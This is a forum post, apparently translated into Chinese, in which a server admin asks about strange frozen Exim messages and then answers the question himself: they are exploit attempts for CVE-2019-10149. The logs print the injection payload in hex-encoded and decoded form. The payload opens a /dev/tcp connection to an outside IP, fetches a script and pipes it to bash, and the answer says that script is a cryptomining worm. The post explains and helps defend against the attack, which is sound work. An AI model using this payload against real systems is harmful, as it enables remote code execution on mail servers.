我突然从我的服务器(Exim 4.89,Debian 稳定版)收到一些奇怪的“消息冻结”电子邮件:
消息 1hcbPR-0005t1-2r 已被冻结(传递错误消息)。
发件人是<>。
以下地址尚未送达:
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\ x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost:“已接收”标头过多 - 疑似邮件循环
$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D
$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost
569P Received: from [163.172.157.143] (helo=localhost)
by myserver.example.org with smtp (Exim 4.89)
id 1hcbPR-0005t1-2r
for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31
它看起来像代码注入但我不明白,而且它对我来说看起来也没什么危害:
root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop
所有消息都类似,只是 IP 地址和端口不同。它们都来自同一个地址。
这是一种已知感染吗?
答案1
我在发帖前找到了答案,觉得它可能对其他人有帮助:它确实对应于利用 Exim 漏洞的尝试,该漏洞允许远程执行任意代码。它已于一周前公布并修复(CVE-2019-10149)。
关于此漏洞的更多详细信息请参见这里。
更新 :
实际上注入的代码是一点也不无害 :
exec 5<>/dev/tcp/51.38.133.232/80
将新的文件描述符 5 分配给 51.38.133.232 端口 80 上的 TCP 连接。也就是说,重定向到文件描述符 5 和从文件描述符 5 重定向将写入此 IP 并从中读取!
然后
echo -e 'GET / HTTP/1.0\n' >&5
将向该服务器发送 HTTP GET 请求,并
tail -n +11 <&5
将丢弃 HTTP 标头,仅保留最终通过 bash 管道执行的恶意 bash 脚本:
|bash
上述脚本是加密劫持矿工它会删除根 crontab 和一些管理工具(例如netstat
),终止正在运行的进程以保留所有 CPU,并尝试通过 SSH 进行传播……